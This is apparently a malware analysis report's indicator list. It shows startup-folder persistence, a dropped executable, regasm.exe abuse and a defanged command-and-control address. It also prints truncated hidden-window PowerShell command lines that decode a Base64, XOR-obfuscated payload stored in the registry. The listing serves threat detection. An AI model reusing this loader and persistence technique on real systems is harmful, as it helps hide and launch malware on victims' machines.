Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\fcfl.url
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %APPDATA%\fcflxpdaywtk.exe
- '14#.#1.236.24':4388
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $cMDcfuRQ='<Full path to file>';$uWnCSiPz=[Convert]::FromBase64String((Get-ItemProperty HKCU:\/Software\/LpdCR).cMDcfuRQ);for ($i=0;$i -lt $uWnCSiPz.Length;$i++){$uWnCSiPz[$i]=[byte]($uWnCSiPz[...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $cMDcfuRQ='<Full path to file>';$uWnCSiPz=[Convert]::FromBase64String((Get-ItemProperty HKCU:\/Software\/LpdCR).cMDcfuRQ);for ($i=0;$i -lt $uWnCSiPz.Length;$i++){$uWnCSiPz[$i]=[byte]($uWnCSiPz[...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'